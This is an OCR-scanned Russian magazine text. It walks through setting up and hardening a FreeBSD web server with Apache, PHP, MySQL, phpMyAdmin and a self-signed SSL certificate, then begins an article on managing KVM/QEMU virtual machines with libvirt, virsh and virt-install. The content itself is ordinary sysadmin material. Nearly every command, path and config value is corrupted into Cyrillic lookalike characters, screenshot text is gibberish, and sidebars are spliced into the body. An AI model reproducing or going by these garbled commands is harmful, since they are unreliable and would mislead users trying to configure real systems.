Следующее окно: вопрос обустановке загрузчика, просто жмем 
<ЕпІег> чтобы установить загрузчик в МВР. Сразу после него появится 
окно разметчика созданного ранее раздела на ВОй-разделы. Здесь 
можно поэкспериментировать, но я бы рекомендовал просто нажать 
<А> чтобы программа сама разметила диск. Далее жмем <0>, чтобы 
подтвердить изменения. 

Следующее окно: выбор источника установки. По дефолту в качестве 
источника используется СО/ОѴО, поэтому просто жмем <Еп1ег>. Под- 
тверждаем выбор нажатием <Еп1ег> в следующем окне. 

Теперь начнется процесс копирования файлов, по окончании кото- 
рого на экран будет выведено сообщение с вопросом о возвращении 
в главное меню инсталлятора. Нажимаем <Еп1ег>, далее <Х>, «Уев» 
и <Еп1ег>. Операционная система должна перезагрузиться. Не за- 
бываем вынуть установочный диск из привода, чтобы ОС загрузилась 
с жесткого диска. 

По окончании загрузки вводим имя пользователя гооі и получаем до- 
ступ к командному интерпретатору. 



Шаг 2. Настройка 

Мы только что установили ЕгееВЗй, но она еще не готова ктому, чтобы 
выполнять роль полноценного сервера: сеть не работает, гооі не име- 
ет пароля, в системетолько один пользователь. Исправим это. 
Перво-наперво, установим пользователю гооі пароль: 

# раззысі 

Дважды вводим пароль. Далее создадим непривилегированного 
пользователя, учетную запись которого мы будем использовать 
для входа на сервер через 55Н. Для этого воспользуемся командой 
асИизег: 

# асИизег 

На экране будут появляться вопросы, на большинство из которых 
можно не давать ответов (жать <Еп1ег>), важными являются только 
имя пользователя, дефолтовый командный интерпретатор (лучше 
выбрать ІсзЫ и пароль. В конце команда выведет на экран получив- 
шийся список настроек пользователя, в ответ на который следует 
ввести слово «уез» (смотри скриншот), и в ответ на следующий вопрос 
ввести «по». 

Чтобы пользователь смог получать права гооі, добавим его в группу 
ѵѵбееі: 

# рм §гоиртосІ іл/бееі -т имя_пользователя 

Исправим файл /еІсЛзІабтак, чтобы никто не смогзапускать файлы, 
расположенные на разделах Лтр и/ѵаг. Для этого добавим флаги 
«поехес» в поле Орбопз каждого из этих разделов (смотри скриншот). 
Установим болеежесткие ограничения на доступ ксистемным фай- 
лам: 

# сбтосі 0600 /е-рс/зузіо^. соігР 

# сбтосі 0600 /е-рс/гс . соігР 

# сбтосі 0600 /е-рс/пеіл/зуз1о§. соігР 

# сбтосі 0600 /е-рс/боз-рз . аііом 

# сбтосі 0600 /е1:с/1о§іп. соп-Р 

Теперь нам нужно настроить сетевое соединение. Во ЕгееВ50 все 
глобальные настройки хранятся в файле /еіс/гс.сопб поэтому откры- 
ваем его с помощью редактора и добавляем следующие строки: 

#ее/еІс/гс.сопР 

бо5-рпате=" 605-р. сот" 

іТсоп6§_ет0="іпе-р 1.2. 3.4 пе-ртазк ѲхТТ-р-р-р-р-р-р" 
сІе-Раи1-ргои-рег="5 . 6 . 7 . 8" 

Здесь етО во второй строке — это имя настраиваемого сетевого 
интерфейса. Список всех доступных сетевых интерфейсов можно 
получить с помощью команды іРсопРід. В качестве значения опции 
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можно указать йНСР, тогда для конфигурирования интерфейса бу- 
дет использован сНасІіепТ Также сразу добавим несколько важных 
для нас опций: 

# ее /еі :с/гс . согѵР 

# Отключаем переадресацию пакетов и 

# регистрируем все попытки переадресации 
істр_сIгор_гесIігес1:= ,, УЕ5 ,, 
істр_1о§_гесIігес1:= ,, УЕ5 ,, 

# Запрещаем ответы на широковещательные ріп§-запросы 
істр-ЬтсаБІіесІіо^'Ш" 

# Очищаем каталог /1:тр при каждой загрузке 
сІеагМітр-епаЫе^'УЕБ" 

# Запрещаем обновление файла /еТс/тоТсІ при каждой загрузке 
и рсі а 1: е_то1: сі = " N0 " 

# Не принимаем пакеты с одновременно установленными 

# флагами 5УИ и РІИ 
1;ср_сIпор_5уп^^п= ,, УЕ5 ,, 

# Отключаем зепсітаіі 
5епсIтаі1_епаЫе="N0 ,, 

Бепсітаі^БиЬтіІ^епаЫе^'Ш" 

# Включаем 55Н 
55І1СІ_епаЫе= ,, УЕ5 ,, 

Чтобы выйти из редактора, нажимаем <Езс> и два раза <А>. 

Добавим адрес РЫЗ-сервера в/еіс/гезоіѵ.сопр 

# ее /еіс/гезоіѵ.соггі 

пашеБегѵег 8. 8. 8. 8 

Чтобы сетевые настройки вступили в силу, выполняем следующую 
команду: 



# /е1:с/пс .сІ/пеТі-р ге1:5І:аг1: 

Проверяем доступность сети: 

# ріп§ ехесЫТ. ги 

Добавим несколько полезных строк в файл /еІс/зуБси.сопТ 

# ее /е1:с/5у5с1:1.соп-Р 

# Не отвечать на попытки подключения к закрытым портам 

# (спасет от некоторых видов 0о5-атак и затруднит 

# сканирование портов) 

пеі: . іпеі: .іср. Ь1аскІіо1е=2 
пеі: . іпеі: . исір. Ь1аскІіо1е=1 

# Разрешаем смотреть список всех процессов только гооі: 
кегп . р5_5Ііоыа11рпос5=0 

Защитим 55Н -сервер отбрутфорс-атак: 

# есбо "МахБіагіирБ 5:50:10" >> /е1:с/55Іі/55ІісІ_сопРі§ 

# /еіс/гс .сі/ббМ гезіагі: 

Теперь 55 Н-сервер будет отбрасывать 50% новых подключений в 
случае, если будет произведено пять неправильных регистраций. 
Когда их станет десять, сервер перестанет отвечать вовсе. 

При использовании экспресс-установки, система портов (фрейм- 
ворк для установки стороннего ПО в ОС) не устанавливается во 
РгееВ5й автоматически, поэтому нам надо сделать это вручную 
(это хорошо, потому что так мы получим самый свежий срез портов 
не содержащий устаревшего дырявого ПО): 

# рогізпар Теісб ехігасі: 

Также можно обновить базовую систему, однако это делать не обяза- 
тельно: 
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Ги II раііі Іи |зиг1 (ЛсГіНіІІ /изг/Ъ іті/ркг 1 ) і 
Тек! і од Риг 1 

РигІ збеепз Іи Ьи ііЪ&іаІІеА ик 



Оригаііпд зцзіит ѵниш: : ГгииВЗО 

□реггаііод зу^ѣит мег^іоп: 8-2 

ЧННННКРІККННІЯНИИНЯННННІППППППІННІІННК^НИИМЙЯЙЙЙЛЯМННЙЯНІППІЯІІІІНЙРІННМНЯМЯИЛ 

1-ІсЬтІп изез Из сип раззысргчі ргрѣесѣе<і ыеЪ зегуег іо ргрц-ііе ассезз 
Іо іИс агі*и п ізігаі і оги ргодгатз. Піе зсіир зсгірі івее<І8 іо кнои : 
иі)иіі ригѣ Іи гни ІНс ыеЬ зсгѵсг ин , ТІіиги ітізі іюі Ьи апиІЬиг 
иісЪ зсгмсг аігсййу изіпд іЬіб рогѣ. 

- ТЬе Іпдіп та» по гедмігсі іо ассеее ѢЬе иеЬ вегѵёг. 

ТЬе рлззиогсі гици ігЫ іо асси&й Уіи ыиЬ эегосг. 

ІГ ѣ}іс ысЪзсгмсг зІш-иІЛ изс 551. С і Г уоиг нузісм зиррогѣз ІѢ5. 

- ШіеіЬег ѣп кілгі иеЬпѵі п ді Ьпоѣ Ѣііпп. 

ИсЪ зсгисг рогѣ (ЛсГйиІІ 1ѲѲѲѲ) : 

І.ПдІП ПЙЬШ (ЛіПІАіІІІ Л4І№І)г): 

ьодіп рлЕзиоггі : 

Рііззиюгіі ада іи : 

Цзя 551. Д 



Запускаем конфигуратор ѴѴеЬтіп 

# ІтееЬзсІ-ирсІаІе -РеЧсІі 

# ІтееЬзсІ-ирсІаІе іпзЧаІІ 

# зЬиІсІоіл/п -г пом 

Послетого как порты будутобновлены, установим в систему ин- 
струмент гкб и піе г, нужный для отлова руткитов, которые могут быть 
установлены в систему в будущем: 

# ссі /изг/рог-Ьз/зесигЧЧу/гкЬипЧег 

# таке іпзііаіі сіеап 

Отредактируем конфигурационный файл /изг/ІосаІ/еІс/гкЬипІег. 
сопітак, чтобы опция МАІІ_-0І\І-ѴѴАРМІІ\І6 содержала етаіі, на 
который следует слать сообщения об обнаруженных аномалиях. 
Заставим инструментпроверитьсебя на обновления: 

# гкЬипІег --ирсІаЧе 

После этого создадим снимок системных файлов, который будет 
использоваться в качестве эталона во время поиска руткитов: 

# гкЬипІег --ргорирсі 

Далее добавим в файл /еіс/регіосііс.сопі две строки, благодаря 
которым проверки обновлений и системы будут происходить каждый 
день: 

# есЬо ' гіаіІу^кІіипІіе^иргіаІ^епаЫе^'ѴЕБ" ' >\ 

/еЧс/регіосІіс . согѵР 

# есЬо ' сІаіІу^кІіипІіег^сЬес^епаЫе^'УЕБ" ' >\ 

/еЧс/регіосІіс . согѵР 

Все, теперь все сообщения о подозрительной системной актив- 
ности будут помещаться в лог/ѵаг/Іод/гкЬипІег.Іод и отсылаться на 
указанный в конфигурационном файле етаіі. 

Далее настроим сгоп на синхронизацию системных часов каждые 
два часа: 



#сгопІаЬ-е 

0 2 * * * гооі /изг/ІосаІ/зЬіп/пІрсІаІе роо1.п1:р.ог§ 

Наконец, установим и ѴѴеЬтіп, ѵѵеЬ-ориентированный интерфейс для 
удаленного управления сервером (те, кто предпочитает использовать 
для администрирования 55Н, могут про пустить этот шаг): 

# ссі /изг/рогЧз/зузиЧіІз/меЬтіп 

# таке іпзііаіі сіеап 

# есЬо , ыеЬтіп_епаЫе="УЕ5" ' >> /еіс/гс . соп-р 
Далее необходимо запустить конфигуратор ѴѴеЬтіп: 

# /изг/ІосаІ/ІіЬ/меЬтіп/зеІіир. зЬ 

На вопросы можно отвечать нажатием <Еп1ег>, однако когда дело 
дойдет до ввода пароля (строка «І_одіп раззѵѵогсі:»), следует вве- 
сти пароль на доступ к ѴѴеЬтіп (лучше, если он будет отличаться от 
остальных паролей). Далее можно запустить ѴѴеЬтіп: 

# /іізг/іосаі/еіс/гс .сІ/меЬтіп зіагі: 

И протестировать его работу, введя адрес «Ыірз://ЬозІ. сот: 1 0000/» в 
адресную строку ближайшего браузера. 

АМР 

Теперь настало время установить стек АМР, то есть — веб-сервер 
АрасЬе, базу данных Му5СН_ и интерпретатор РНР. Сначала займемся 
АрасЬе. Идем в порты и устанавливаем последнюю версию: 

# ссі /изг/рог1:5/ыыы/арасЬе22 

# таке соп1й§ іпзііаіі сіеап 

На экране должно появиться окно конфигуратора, с помощью 
которого ты можешь выбрать установку опциональных компонентов 
сервера. Что-либо менять здесь смысла нет, поэтому можешь смело 
жать <ЕпІег>. После окончания сборки и установки не забудь добавить 
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Запрещаем запуск приложений с разделов Лтр и /ѵаг 

сервер в автозапуск (если поддержка 55І_ не требуется, вторую строку 
МОЖНО пропустить): 

# есбо ' арасбе22_епаЫе="ѴЕ5" ' >> /еіс/гс . согѵР 

# есбо ' арасбе2255І_епаЫе="ѴЕ5" ' >> /еіс/гс. согѵР 

Также в конфигурационный файл следует добавить инструкцию для 
загрузки модуля ассНШр, который будет буферизировать НТТР- 
соединения, что разгрузитсервер и поможет в борьбе с 5ѴІ\І-флудом: 

# есбо ' ассТ_б1:1:р_геасІу= ,, УЕ5" ' >> /еТс/гс . согѵР 

# кісііоасі асс-МтбЬр 

Далее установим интерпретатор РНР пятой версии: 

# ссі /и5г/рог1:5/1ап§/рбр5 

# таке сопРі§ іпзіаіі сіеап 

Убедись, что опция «Виіісі Арасбе тосіиіе» выбрана. 

Плюс несколько расширений кнему: 

# ссі /изг/рог1:5/1ап§/рбр5-ех1:еп5Іоп5 

# таке сопРі§ іпзіаіі сіеап 

Важно, чтобы на шаге конфигурирования РНР ты не забывал от- 
метить пункт«Му5С!І_ сіаіа базе з и р р о гі » , принуждающий систему 
портов кустановке модуля РНРдля работы с Му5С!І_. Без него ничего 
не заработает. 

Теперь открываем конфигурационный файл Арасбе в текстовом 
редакторе (во РгееВЗО он запрятан далеко: /изг/ІосаІ/е1:с/арасЬе22/ 
ЫТрб.сопб и изменяем в нем следующее: 

1. После строк БоасІ Мосіиіе добавляем следующие две строки: 

АсІсІТуре арр1іса1:іоп/х- Ы:1:рсІ - рМр . рИр 
АсІсІТуре арр1іса1:іоп/х-ІтІ:1:рсІ-рІір-5оигсе . рбрз 

2. Находим опцию ЗегѵегАсІппіп и прописываем в качестве ее значе- 
ния свой почтовый адрес: 

БегѵегАсІтіп тефБІіе. сот 

3. В опции ОоситепіРооІуказываем каталог, в котором будутхранить- 
ся все файлы нашего веб-сайта: 

ОоситепіКооІ: "/боте/ыыы/сіаіа" 

Не забываем создать этот каталог: 

# тксііг /боте/ммм 

# тксііг /боте/ммм/сіаіа 



Инсталлятор РгееВЗЭ сам разбивает раздел на подраз- 
делы 

# тксііг /боте/млм/с§і-Ьіп 

Я предпочитаю использовать в качестве корневого каталога / 
ботеЛллл/ѵѵтак как, во-первых, каталог/боте обычно находится на 
самом большом разделе (автоконфигуратор разделов, который мы 
использовали в ходе установки, отводит под /боте большую часть 
пространства), а во-вторых, с ним проще работать, чем с каким- 
н и б уд ь/изг/іосаі/ ѵѵѵѵѵѵ/ арасбе22/сІа1;а, запрятанным во множество 
подкаталогов. 

4. Находим следующую строку: 

кОігесіогу /изг/1оса1/ыыы/арасбе22/сІа1:а> 

И меняем ее та к, чтобы в качестве каталога был указан 
ОоситепіРооІ:: 

кОігесіогу /боте/млм/сІа1:а> 

5 . Меняем следующие строки: 

<і-РМосІи1е сІіг_тосІи1е> 

Оігесіогуіпсіех іпсіех.біті 
</і-РМосІи1е> 

На ЭТИ: 

<і-РМосІи1е сІіг_тосІи1е> 

Оігесіогуіпсіех іпсіех.рбр іпсіех.біті 
</і-РМосІи1е> 

6 . Внутри директивы <і1 : МосІи[е аІіа5_ппосІиІе> заменяем строку: 

БсгіріАІіаз /с§і-Ьіп/ м /и5г/1оса1/ыыы/арасбе22/с§і-Ьіп/" 

ВОТ ЭТОЙ: 

БсгіріАІіаз /с§і-Ьіп/ "/боте/ыыы/с§і-Ьіп/" 

7 . Следующую строку: 

кОігесіогу "/и5г/1оса1/ыыы/арасбе22/с§і-Ьіп"> 

Заменяем этой: 

кОігесіогу "/боте/ыыы/с§і-Ьіп"> 

Сохраняем файл и создаем файл настроек РНР: 

# ср /изг/іосаі/еіс/рбр.іпі-гесоттепсіесі /изг/іосаі/еіс/рбр. іпі 
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ІКи 1 I ікші: : 

ІИй (Ьсаѵс стріу Гог йсГлмНЭ- 

иодІП ді'Оир Щ 1 т 1 : 

Ьодіп дгоир і® иіт, іпмііе Дт іпіо оіііег дгоирз? С ] : 
Ьодіп сіаег ІйеГаиІі): 

ЙІісІІ (кіі і:кЬ Іі:к)і моіпуіп) Гхііі: іскЬ 

Нате Лігесіогд [/Ьоте/Дт] : 

Ноте Йігееіогу регтізкіопв (Іеаѵе етрід Гог ДсГдиИ): 
Ике роыкиогй Ьаыей аиіЬспѣ ісаі Іоі»? [дез]: 
иге ап сіяріу рагзыогй? (усг/по У [по]: 

Изе а глпйот раззиогй? (уез^по) I по 1 : 

Епісг раззыогй : 

Епѣег рагзиаггі адаіп: 

І.пск пиі ііік лспшіпі лГіег і:геаі іпп? [пп] ! 

Изегпате : ,} 1 т 

Наггыогй : ■»****« 

Г» I I Мате : 

и ІЙ : 1001 

Сідзз : 

бгаирз : Дт 

Ноте : /‘Іштм/'Дт 

Ноте МоЛе : 

КІіеІІ : /Ып/Ісзіі 

ЬоскисІ : но 

□К? (уев/по ) : уегі 



Создаем нового пользователя 

Этого будет достаточно для нормальной работы Арасбе совместно с 
РНР. Теперь можно приступить кустановке Му5СН_. Идем в порты и 
делаем следующее: 

# ссі /изг/рог1:5/сІа1:аЬа5е5/ту5ЯІ5Ѳ-5епѵеп 

# таке ІлІІТН_0РЕІ\І55І_=уе5 Іпз1:а11 сіеап 

Создадим рудиментарный конфигурационный файл, которого хватит 
на первое время: 

#ее/еІс/ту.сггі 

[сііепі:] 

рог1:=29912 

[тузріеі] 

рог!=29912 

ЬіпсІ-асІсІге55=127.0.0. 1 

Добавим Му5СН_ в автозагрузку и запустим сервер: 

# есбо 1 туБя1_епаЫе="УЕ5" 1 << /еіс/гс . сопТ 

# /ивг/іосаі/еііс/гс .сІ/туБрІ-вегѵег зііагі: 

Установим пароль на доступ кбазе данных: 

# тувріасітіп -и гооТ ра55ыогсІ пароль 

# тузрі -и пооі: -р 

Теперь Му50І_должна нормально функционировать, ноуправлять 
базами данных вручную не оченьудобно, ктомуже, для некоторых это 
будет первый опытустановки Му5С11_, а с наскоку разобраться с ней не 
так-то просто. Поэтомуустановим веб-интерфейсуправления Му5СН_ 
под названием РНРМуАбтіп: 

# ссі /изг/рог1:5/сІа1:аЬа5е5/рІіртуасІтіп 

# таке іпзіаіі сіеап 



Поправим конфигурационный файл РНРМуАбтіп, указав пароль на 
доступ кѵѵеЬ-интерфейсу: 

# ссі /изг/ІосаІ/ыыы/рІірМуАсІтіп 

# ср соп1і§. затріе. іпс . рбр соп1і§. іпс . рбр 

#еесоггіід.іпс.рМр 

$сТ§[ ’ Ь1оы1і5Іі_5есге1: 1 ] = 'пароль'; 

Теперь вновь открываем конфигурационный файл Арасбе и делаем 
следующее: 

1. В секцию <І[МобиІе аІіа5_тосІиІе> добавляем следующую строку: 
Аііаз /рбртуасітіп /изг/ІосаІ/ыыы/рІірМуАсІтіп 

2. В конец секции <0ігес1огу> добавляем следующие строки: 

кОіпесІопу "/и5г/1оса1/ыыы/рІірМуАсІтіп"> 

Огсіег аііоілцеіепу 
АІІоы Тпот аіі 
</0ігес1:огу> 

Здесь вместо «АІІоѵѵ [гот аіі» можно добавить что-то вроде «АІІоѵѵ 
[гот 123.456.789.0/12», чтобы разрешить доступ к РНРМуАбтіп только 
из определенной подсети. 

Перезапускаем Арасбе: 

# /и5г/1оса1/е1:с/гс .сІ/арасІіе22 гезіагі: 

Это все, теперь (І_)АМР должен работать. 

НТТР5 

РНРМуАбтіп для корректной работы требует поддержку НТТР5, 
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Не забываем включить модуль АрасНе во время сборки РНР 



и вполне возможно, что в будущем тебе понадобится этот прото- 
кол для установления безопасного зашифрованного соединения 
между клиентом и сайтом. Поэтому сделаем так, чтобы Арасбе его 
понимал. 

Для начала исправим конфигурационный файл 0реп55І_ (/еіс/ззі/ 
орепззі.спб, добавив в него следующие строки: 

# Каталог для хранения сертификатов 
(Иг = /гооі/ббіСА 

# Срок действия сертификата (~1Ѳ лет) 
сІе-Раи11:_сІау5 = 3650 

Теперь подготовим каталоги создадим сертификаты для собственного 
центра сертификации: 

# ссі /гооі 

# тксііг 55ІСА 

# сбтосі 700 55ІСА 

# сбтосі 700 55ІСА 

# тксііг ргіѵаіе 

# ССІ 55ІСА 

# орепззі гея -пем -х509 -сІауБ 3650 -ехіепБІопБ ѵЗ_са \ 

-кеуоиі: ргіѵаіе/сакеу . рет -оиі: сасегі.рет \ 

-соп^і§ /еіс/ББІ/орепББІ. сггР 

Проверим, что сертификаты были созданы успешно: 



# ср /гоо1:/55ІСА/имя_хоста-сег1: . рет /еіс/ББІ/сгІ: 

# ср /гоо1:/55ІСА/ргіѵа1:е/имя_хоста-кеу . рет /еіс/ББІ/кеу 

Снова открываем конфигурационный файл Арасбе, находим следую- 
щую строку и раскомментируем ее: 

# ее /и5г/ІосаІ/еІс/арасИе22/МНрсІ.сопТ 

#Іпс1исІе еіс/арасІіе22/ех1:га/ІтІ:1:рсІ-55І. согѵР 

Вносим следующие изменения в файл /изг/іосаі/еі с/а расбе22/ех1та/ 
ІШр-ззІ.сопС 

# ее /и5г/ІосаІ/еІс/арасИе22/ехІга/Шр-55І.соггі 

# Имя НТТРБ-сервера 
БегѵегІМате ббі . Тіобі: . сот 

# Путь до файла, содержащего сертификат и ключ 
ББІ-СегііІісаіеРіІе /еіс/ББІ/сгі/уоигІіоБіпате-сегІ: . рет 
ББІ-СегііІйсаіеКеуРіІе /еіс/ББІ/кеу/уоигІіоБіпате-кеу . рет 

# То же., что и в главном конфиге 
ОоситепіКооІ: "/Ііоте/ыілЛл//сІа1:а" 

# Куда писать логи 

ЕггогІ_о§ "/ѵаг/іо^/ітіірсі-еггог. 1о§" 

Тгап5-РегІ_о§ "/ѵаг/Іо^/ІтіірсІ-ассеББ . 1о§" 



# І5 -1 сасегі.рет ргіѵаіе/сакеу . рет 

Сгенерируем сертификаты для Арасбе и поместим их в каталог/еіс/ 

55 1 : 

# ССІ /гооі/ббіСА 

# орепББІ гея -пем -посІеБ -оиі: имя_хоста-гея.рет \ 

-кеуоиі: ргіѵаіе/имя_хоста-кеу.рет -сопИ§ /еіс/ББІ/орепзБІ.сп-р 

# орепББІ са -соп1і§ /еіс/ББІ/орепзБІ.сп-р -оиі: \ 
имя_хоста-сег1:.рет -іпІіІеБ имя_хоста-гея.рет 



Перезапускаем Арасбе: 

# /изг/іосаі/еіс/гс .сІ/арасІіе22 гезіагі: 

Что дальше? 

В этой статье я показал, как поднять полностью работоспособный 
стек (І_)АМР на базе РгееВБО (так что это скорее РАМР), и все, что 
тебетеперь нужно сделать, это скачать свой любимый сайтовый 
движок и развернуть его в каталог /Ьоппе/ѵѵѵѵѵѵ/сіаіа (не забыв по- 
ложить скрипты в /Ь о т е/ѵѵѵѵѵѵ/сд і - Ь і п ) . Все остальное возьмет на 
себя (І_)АМР. т 
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ЗУИ/АСК 



■ ■ Евгений Зобнин (ехесЬіІ.ги) 




Виртуальный 

полигон 

Управляем фермой виртуальных серверов легко 
и непринужденно 

Эмулятор ОЕМІІ, работающий в связке с КѴМ, — это отличная система виртуализации, с помощью 
которой можно не только легко создавать подручные виртуальные машины, но и организовывать 
целые фермы виртуальных серверов. Проблема только в том, что управлять такой фермой с по- 
мощью стандартных средств весьма затруднительно. 



Сложности всех администраторов, принявших решение использо- 
вать систему виртуализации на основе КѴМ и ОЕМІІ для управ- 
ления парком виртуальных машин, вытекают из того простого 
факта, что сама по себе эта связка никогда не была рассчитана 
на подобное применение. Эмулятор ОЕМІІ был создан с целью 
предоставить пользователям простое и быстрое средство запуска 
виртуальных машин с целью отладки и ознакомления. Интерфейс 
КѴМ создан для использования возможностей аппаратной виртуа- 
лизации, реализуемой современными процессорами. Вместе они 
составляют систему, которая очень хорошо подходит для запуска 
одиночных виртуальных машин, но в принципе не предназначена 
для управления десятками и сотнями виртуальных окружений. 
Систему ОЕМІІ+КѴМ следует рассматривать только какядро 
комплексной системы виртуализации, поверх которого должна 
быть построена более сложная инфраструктура для управления 
многими инстанциями ОЕМІІ. 

Уровнем выше 

Существует огромное количество самых разных систем управ- 
ления парками виртуальных машин, использующих ОЕМІІ+КѴМ. 
Начиная от самопальных скриптов, в спешке набросанных 
сисадминами и выложенными в Сеть, и заканчивая серьезными 
коммерческими программными комплексами уровня предприя- 
тия. Однако наше внимание заслуживают только те из них, которые 
в своей работе используют библиотеку ІіЬѵігС 
І_і Ьѵігі — это отлаженная и со всех сторон протестированная би- 
блиотека, с помощью которой любое приложение может быть легко 
обучено управлению виртуальными серверами. Поэтому система, 
основанная на Іі Ьѵі гі, будет, во-первых, априори стабильнее и 
предсказуемее разработок, использующих свой собственный 
интерфейс управления. Во-вторых, Іі Ьѵігі; поддерживает кучу раз- 
личных систем виртуализации, начиная с КѴМ и Хе п и заканчивая 
ѴМѵѵаге и ОрепѴХ. Это очевидный плюс, потому как если в будущем 
планируется переезд на другую систему, менять придется не 
много (более того, инструменты, входящие в состав пакета Іі Ьѵігі;, 
позволяют произвести миграцию между системами без проблем). 
В-третьих, Іі Ьѵі гі; — это стандарт, систем управления ВМ на его 
основе будет становиться все больше и, если когда-то появится 
альтернатива выбранному сегодня решению, переезд будет абсо- 
лютно безболезненным. 

Следующие разделы статьи будут целиком и полностью посвяще- 
ны системам управления, основанным на Іі Ьѵігі, поэтому приве- 
денные в них инструкции подойдут для управления любым другим 
поддерживаемым ей эмулятором. 



ѵігзЬ 

Команда ѵігзЬ — один из главных инструментов управления Іі Ьѵігі. 
Она входит в стандартную поставку самой библиотеки, поэтому из 
коробки доступна практически в любом дистрибутиве. Кроме того, 
это единственный инструмент, который умеетзадействовать все 
возможности ІіЬѵігІ, поэтому если сдругими системами возникнут 
проблемы, ѵігзЬ всегда придет на выручку. 

Для установки ѵігзЬ следует инсталлировать в систему пакет ІіЬѵігІ, 
а также все необходимые для работы с виртуальными машинами 
пакеты (в нашем случае это КѴМ, ОЕМІІ, Ьпзтазц и Ьпбде-иЫз). 
Эти пакеты доступны в репозитории любого дистрибутива, поэтому 
для их установки необходимо выполнить всего одну команду (при- 
мер для ІІЬипІи): 

$ зисіо арі-§е1: іпзіаіі ЬгісІ§е-и1:іІ5 сіпзтазд кѵт \ 
дети ІіЬѵігІ: ІіЬѵігі-Ьіп 

Также нам пригодится инструмент под названием ѵігі-іпзіаіі, он 
нужен для создания файлов-описаний виртуальных окружений, 
которые понадобятся при работе с ѵігзЬ, но не могут быть созданы 
ей (предполагается, что приложения, использующие ІіЬѵігІ, будут 
генерировать их сами): 

$ зисіо арі-§е1: іпзіаіі ѵігііпзі: 

Чтобы команда ѵігзЬ и другие инструменты работали правильно, 
должен быть запущен демон ІіЬѵігІсІ. 

Обычно пакетные менеджеры запускают его самостоятельно при 
установке пакета, но в некоторых системах (например, АгсЬЫпих) 
этого не происходит. Поэтому убедимся, что ІіЬѵігІсІ запущен: 

$ рз ах | §гер ІіЬѵігісІ 

Если он не работает, запустим его (в некоторых системах вместо 
іпіі.сі следует указать гс.Ь): 

$ зисіо /еііс/іпіі: . сі/1іЬѵігі:сі зіагі: 

Для проверки работоспособности всей системы выполним сле- 
дующие команды: 

$ зисіо ѵігзЬ --соппесі дети : ///зузіет ѵегзіоп 
$ зисіо ѵігзЬ --соппесі дети : ///зузіет Іізі: 
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Отладка ѵігі-іп$іаІІ I Отключение АСРІ 



Утилита ѵігі-іпзіаіі не всегда работает безупречно. 
Чтобы разобраться, почему происходит ошибка 
запуска, используй флаг '-6', который принудит 
утилиту записывать всю отладочную информацию в 
файл ~/.ѵігбпз1:/ѵігИп5І:аІІ.Іод. 



Если все в порядке, первая команда должна вывести 
нечто вроде этого: 

Скомпилировано на базе библиотеки: ІіЬѵіг 0.9.0 
Используется библиотека: ІіЬѵіг 0.9.0 
Используется АРІ: (^ЕМІІ 0.9.0 
Выполняется гипервизор: (^ЕМІІ 0.14.0 

А вторая — пустой список виртуальных машин. Стоит 
попробовать запустить ѵігзб без аргумента '--соппесК 
(зисіо ѵігзб ѵегзіоп), чтобы ІіЬѵИ попыталась сама найти 
предпочтительную систему виртуализации. Если вывод 
будет совпадать, в дальнейшем можно не утруждать 
себя указанием опции '--соппесК. Сразу скажу что ІіЬѵИ 
позволяетуправлять системой виртулизации удаленной 
стороны с помощью 55Н-туннеля. Делается это пример- 
но так (здесь опция '-с' — это сокращение соппесЕ): 

$ ѵігбіі -с \ 

дети+ББІі : //гооі:@ііо5і: . сот/зузіет команда 

Все приведенные далее команды могут быть выпол- 
нены таким же образом. Более того, «команду» можно 
вообще не указывать, тогда откроется шелл ѵігзЬ. Он 
хорош, в частности, тем, что поддерживает авто- 
дополнение команд и имеет встроенную справку. 

Для создания первой виртуальной машины запустим 
ѵИ-іпзІаІІ следующим образом: 



Далеко не каждая операционная система 
может нормально работать с подсистемой АСРІ, 
реализованной в ОЕМ II. Чтобы отключить ее, 
просто передай опцию '--поасрі' или поаріс' 
(лучше обе] команде ѵИ-іпзІаІІ. 



$ біісіо ѵігі-іпБіаІІ --соппесі дети :///5у5І:ет \ 
--пате ѵті \ 

--гат 512 \ 

- - ѵпс \ 

--оз-іуре Нпих 
--оз-ѵагіапі: иЬипіитаѵегіск \ 

--ассеіегаіе \ 

--пеіыогк=пе1:ыогк:сІе-Раи11: \ 

--сІІБк \ 

раіЬ=/ѵаг/1іЬ/1іЬѵіг1:/іта§е5/ѵт1 . іт§, 5Ііе=5 \ 
--ссігот /1:тр/иЬип1:и-10.10-5егѵег-і386.І5О \ 
--поаиіосопБОІе 

Команда сгенерируетобраз новой виртуальной машины 
и запуститего с помощью эмулятора ОЕМІІ. Машина 
будет иметь имя ѵті (опция' --пате'), 512Мб памяти 
('--гат'), вывод ее дисплея будеттранслироваться по 
сети с помощью ѴЫС-сервера (позже мы рассмотрим, 
как к нему подключиться). Конфигурация виртуальной 
машины будет подобрана в расчете на оптимальную 
работу операционной системы Ыпих ('--оз-іуре Ііпих') 
и конкретно дистрибутива ІІЬипІи 1 0.1 0 ('--оз-ѵагіапі; 
ибипіитаѵегіск'), по возможности будутзадействованы 
средства аппаратной виртуализации ('--ассеіегаіе'). 
Опция ' — пеіѵѵогк' предназначена для указания спосо- 
ба подключения виртуального окружения к сети. Всего 
существуеттри возможных варианта этой опции: 

1 . ЬгісІде:имя_моста — подключение к внешней сети 




# В любой момент к 
виртуальной машине 
можно подключить 

НОВЫЙ ДИСК: 
біісіо ѵігБІі аііііасіі -сІІБк 
--сігіѵег Іпіе --Туре 
ссігот --тосіе геасіопіу 
/ѵаг/ИЬ/ІіЬѵігІ:/ 
іта§е5/ссІгот.І50 бсіс 

# Конфиг существую- 
щей виртуальной 
машины легко про- 
смотреть и исправить: 

# ѵігбіі сіитрхті ѵті > 
~/ѵт1.хт1 

# ѵі ѵті.хті 

# ѵігбіі сгеаТе ѵті.хті 
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Главное окно ѵігі-тападег 



Настройка сетевого моста в 
ІІЬипііи 



1. Открываем файл /еіс/пеіѵѵогк/іпіегі'асез, удаляем текущее 
содержимое и добавляем следующие строки (указав 
правильные ІР-адреса, маску и так далее): 

аиііо Іо 

і-Расе Іо іпеі: ІоорЬаск 

аиііо Ьп0 

і-Расе Ьг0 іпеі: зііаіііс 

асИгезз 192.168.0.10 
пеіыогк 192.168.0.0 
пеітазк 255.255.255.0 
Ьгоасісазі: 192.168.0.255 
^аіеыау 192.168.0.1 
Ьпісі§е_рог1:5 еіІіѲ 
ЬпісІ§е_-РсІ 9 
Ьпісі§е_Ііе11о 2 
ЬгісІ§е_таха§е 12 
ЬгісІ§е_5І:р о-р-р 

2. Перезапускаем сеть: 

$ зисіо /еіс/іпі1:.сІ/пе1:ыопкіп§ гезііагі: 

3. Останавливаем и отключаем бЬссІЬсІ: 

$ зисіо /еііс/іпіі: . сі/сіИссіЬсі 5І:ор 

